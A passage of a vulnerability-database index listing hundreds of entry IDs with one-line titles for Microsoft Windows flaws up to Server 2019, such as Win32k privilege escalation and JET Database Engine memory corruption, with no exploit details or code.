information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153228] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153224] Microsoft OneDrive on Windows privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151148] Microsoft Windows Connected User Experiences/Telemetry Service information disclosure [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151094] Microsoft Windows up to Server 1909 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149962] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Hyper-V privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [149941] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [149940] Microsoft Windows up to Server 2019 Win32k privilege escalation [149939] Microsoft Windows up to Server 2019 Win32k privilege escalation [149938] Microsoft Windows up to Server 2019 Win32k privilege escalation [149937] Microsoft Windows up to Server 2019 Win32k privilege escalation [149936] Microsoft Windows up to Server 2019 Win32k privilege escalation [149935] Microsoft Windows up to Server 2019 Win32k privilege escalation [149934] Microsoft Windows up to Server 2019 Win32k privilege escalation [149933] Microsoft Windows up to Server 2019 Win32k privilege escalation [149932] Microsoft Windows up to Server 2019 Win32k information disclosure [149931] Microsoft Windows up to Server 2016 Win32k information disclosure [149930] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149929] Microsoft Windows up to Server 2019 DirectX information disclosure [149928] Microsoft Windows 10/Server 2016 DirectX privilege escalation [149927] Microsoft Windows up to Server 2019 Imaging Library memory corruption [149926] Microsoft Windows up to Server 2019 IME privilege escalation [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149922] Microsoft Windows up to Server 2019 Wireless Network Manager privilege escalation [149921] Microsoft Windows up to Server 2019 Backup Service privilege escalation [149920] Microsoft Windows up to Server 2019 Client License Service privilege escalation [149919] Microsoft Windows up to Server 2019 Telephony Service information disclosure [149913] Microsoft Windows up to Server 2019 Win32k privilege escalation [149910] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [149909] Microsoft Windows up to Server 2019 COM Server privilege escalation [149907] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149906] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149905] Microsoft Windows up to Server 2019 Function Discovery Service privilege escalation [149904] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [149903] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149902] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149901] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149900] Microsoft Windows up to Server 2019 Kernel privilege escalation [149899] Microsoft Windows up to Server 2019 Kernel privilege escalation [149898] Microsoft Windows up to Server 2019 Kernel privilege escalation [149897] Microsoft Windows up to Server 2019 Kernel privilege escalation [149896] Microsoft Windows up to Server 2019 Kernel privilege escalation [149895] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149894] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [149891] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [149890] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [149889] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149888] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [149887] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [149886] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [149884] Microsoft Windows up to Server 2019 Media Foundation memory corruption [149883] Microsoft Windows up to Server 2019 LNK privilege escalation [149882] Microsoft Windows up to Server 2019 memory corruption [149881] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149880] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [149312] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149039] Microsoft Windows 10 1803/Server 2019 RDP Session Lockscreen weak authentication [148654] Microsoft Windows up to Server 2019 Memory Section privilege escalation [148653] Microsoft Windows up to Server 2019 Win32k privilege escalation [148652] Microsoft Windows up to Server 2019 Media Service privilege escalation [148651] Microsoft Windows up to Server 2019 Update Notification Manager privilege escalation [148650] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Subsystem for Linux privilege escalation [148649] Microsoft Windows up to Server 2019 Symbolic Link privilege escalation [148648] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [148638] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Win32k privilege escalation [148637] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [148634] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [148631] Microsoft Windows Server 2016/Server 2019 Remote Desktop Gateway privilege escalation [148629] Microsoft Windows up to Server 2019 Hard Link privilege escalation [148627] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [148626] Microsoft Windows Remote Desktop Gateway privilege escalation [148625] Microsoft Windows Remote Desktop Gateway privilege escalation [148614] Microsoft Windows up to Server 2019 GDI+ information disclosure [148613] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148612] Microsoft Windows Remote Desktop Credentials information disclosure [148611] Microsoft Windows up to Server 2016 Graphics Component information disclosure [148610] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [148609] Microsoft Windows up to Server 2019 Win32k information disclosure [148608] Microsoft Windows up to Server 2019 Graphics Component information disclosure [148607] Microsoft Windows up to Server 2019 CryptoAPI Crypt32.dll weak authentication [146926] Microsoft Windows XP SP3 Remote Desktop Protocol information disclosure [146924] Microsoft Windows up to Server 2019 Defender memory corruption [146879] Microsoft Windows up to Server 2019 OLE privilege escalation [146878] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [146877] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146876] Microsoft Windows 7 SP1 Windows Media Player information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146874] Microsoft Windows 10 1809/Server 2019 Printer Service privilege escalation [146873] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [146872] Microsoft Windows up to Server 2019 Kernel information disclosure [146871] Microsoft Windows up to Server 2019 Kernel information disclosure [146870] Microsoft Windows up to Server 2019 Hyper-V information disclosure [146869] Microsoft Windows up to Server 2019 GDI information disclosure [146868] Microsoft Windows up to Server 2019 GDI information disclosure [146867] Microsoft Windows up to Server 2019 GDI information disclosure [146862] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [146858] Microsoft Windows up to Server 2019 Win32k information disclosure [146857] Microsoft Windows up to Server 2016 Win32k privilege escalation [146855] Microsoft Windows up to Server 2019 Win32k Graphics privilege escalation [146804] Microsoft Windows Media Center XML External Entity [145412] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145402] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145394] Microsoft Windows up to Server 2019 Win32k information disclosure [145393] Microsoft Windows up to Server 2019 GDI information disclosure [145390] Microsoft Windows up to Server 2019 Win32k information disclosure [145388] Microsoft Windows up to Server 2012 R2 Win32k privilege escalation [145386] Microsoft Windows up to Server 2012 R2 DirectWrite information disclosure [145384] Microsoft Windows up to Server 2019 NetLogon Security Feature privilege escalation [145382] Microsoft Windows up to Server 2019 iphlpsvc.dll privilege escalation [145380] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [145379] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145377] Microsoft Windows up to Server 2019 Installer privilege escalation [145375] Microsoft Windows up to Server 2012 R2 OpenType Font Driver ATMFD.dll information disclosure [145374] Microsoft Windows up to Server 2019 DirectWrite information disclosure [145373] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [145372] Microsoft Windows up to Server 2019 Win32k privilege escalation [145370] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [145367] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145366] Microsoft Windows up to Server 2019 Win32k privilege escalation [145365] Microsoft Windows up to Server 2019 Win32k privilege escalation [145364] Microsoft Windows up to Server 2019 Win32k privilege escalation [145363] Microsoft Windows up to Server 2019 Win32k privilege escalation [145362] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 Kernel privilege escalation [145361] Microsoft Windows up to Server 2019 privilege escalation [145360] Microsoft Windows up to Server 2019 Certificate Dialog privilege escalation [145359] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [145358] Microsoft Windows up to Server 2019 Netlogon privilege escalation [145357] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [145355] Microsoft Windows up to Server 2019 Servicing Stack information disclosure [145353] Microsoft Windows 10 1809/10 1903/Server 2019 Data Sharing Service privilege escalation [145352] Microsoft Windows up to Server 2019 Error Reporting information disclosure [145350] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [145349] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145348] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [145346] Microsoft Windows up to Server 2019 Kernel information disclosure [145345] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145344] Microsoft Windows up to Server 2019 privilege escalation [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [145341] Microsoft Windows 10 1903/Server 1903 Media Foundation memory corruption [145340] Microsoft Windows up to Server 2019 OpenType Font Parser memory corruption [145334] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145333] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [145332] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [145331] Microsoft Windows up to Server 2019 Hyper-V Switch privilege escalation [143118] Microsoft Windows up to Server 2019 IIS memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143113] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143112] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [143103] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [143102] Microsoft Windows up to Server 2019 Power Service umpo.dll privilege escalation [143101] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [143100] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [143098] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client information disclosure [143097] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143096] Microsoft Windows up to Server 2019 Kernel information disclosure [143090] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [143089] Microsoft Windows up to Server 2019 rdbss.sys memory corruption [143088] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Update Client privilege escalation [143084] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143083] Microsoft Windows up to Server 2019 TLS information disclosure [143082] Microsoft Windows up to Server 2019 Hardlink privilege escalation [143081] Microsoft Windows up to Server 2019 Setup privilege escalation [143080] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [143077] Microsoft Windows up to Server 2019 Imaging API memory corruption [143076] Microsoft Windows 10 1703/10 1709/10 1803/Server 1803/Server 2019 Hyper-V privilege escalation [143075] Microsoft Windows up to Server 2019 NTLM MIC weak authentication [143071] Microsoft Windows up to Server 2019 MS XML XML External Entity [143063] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [142140] Microsoft Windows Defender File privilege escalation [141652] Microsoft Windows up to Server 2019 Common Log File System Driver information disclosure [141637] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141631] Microsoft Windows up to Server 2019 SMB Client Driver information disclosure [141630] Microsoft Windows up to Server 2019 memory corruption [141629] Microsoft Windows up to Server 2019 Update Delivery Optimization privilege escalation [141627] Microsoft Windows up to Server 2019 GDI information disclosure [141626] Microsoft Windows up to Server 2019 Win32k privilege escalation [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [141621] Microsoft Windows up to Server 2019 Kernel information disclosure [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [141619] Microsoft Windows up to Server 2019 ALPC privilege escalation [141618] Microsoft Windows up to Server 2019 hdAudio.sys privilege escalation [141617] Microsoft Windows up to Server 2019 Store Installer privilege escalation [141616] Microsoft Windows up to Server 2019 ALPC privilege escalation [141615] Microsoft Windows up to Server 2019 Winlogon privilege escalation [141614] Microsoft Windows up to Server 2019 Compatibility Appraiser privilege escalation [141606] Microsoft Windows up to Server 2019 Win32k privilege escalation [141605] Microsoft Windows up to Server 2019 Hyper-V information disclosure [141604] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [141603] Microsoft Windows up to Server 2019 GDI information disclosure [141602] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141601] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141600] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141599] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141598] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141597] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141596] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141595] Microsoft Windows up to Server 2019 DirectWrite information disclosure [141594] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141593] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141592] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141591] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [141590] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [141581] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [141580] Microsoft Windows up to Server 2019 Transaction Manager information disclosure [141579] Microsoft Windows up to Server 2016 DirectX information disclosure [141577] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [141575] Microsoft Windows up to Server 2019 lnk File privilege escalation [141563] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141562] Microsoft Windows up to RT 8.1 Remote Desktop privilege escalation [141561] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [141560] Microsoft Windows up to Server 2019 Remote Desktop privilege escalation [139972] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139971] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139970] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139969] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139968] Microsoft Windows up to Server 2019 HTTP2 HTTP.sys denial of service [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139965] Microsoft Windows up to Server 2019 Kernel information disclosure [139964] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139963] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [139962] Microsoft Windows up to Server 2019 Remote Desktop Protocol privilege escalation [139960] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139958] Microsoft Windows up to Server 2019 DHCP Server memory corruption [139955] Microsoft Windows up to Server 2019 SyncController.dll privilege escalation [139949] Microsoft Windows up to Server 2019 XmlLite Runtime XmlLite.dll XML External Entity [139942] Microsoft Windows up to Server 2019 rpcss.dll privilege escalation [139941] Microsoft Windows up to Server 2019 DirectX privilege escalation [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [139936] Microsoft Windows up to Server 2019 SymCrypt information disclosure [139935] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 NTFS privilege escalation [139934] Microsoft Windows 7 SP1/Server 2018 R2 SP1/Server 2018 SP2 Win32k privilege escalation [139933] Microsoft Windows up to Server 2019 p2pimsvc privilege escalation [139932] Microsoft Windows up to Server 2019 Kernel privilege escalation [139931] Microsoft Windows up to Server 2019 File Signature Security Feature 7PK Security Features [139930] Microsoft Windows up to Server 2019 ALPC privilege escalation [139928] Microsoft Windows up to Server 2019 Kernel privilege escalation [139927] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139926] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139925] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139924] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139922] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139921] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139920] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139919] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [139918] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139917] Microsoft Windows up to Server 2019 Graphics Component information disclosure [139916] Microsoft Windows up to Server 2019 XML Core Services MSXML Parser XML External Entity [139914] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139913] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139912] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Hyper-V Network Switch privilege escalation [139911] Microsoft Windows up to Server 2019 memory corruption [139910] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139909] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139908] Microsoft Windows up to Server 2019 Bluetooth weak encryption [139907] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139906] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [139895] Microsoft Windows up to Server 2019 lnk File privilege escalation [139894] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [139893] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139892] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [139891] Microsoft Windows up 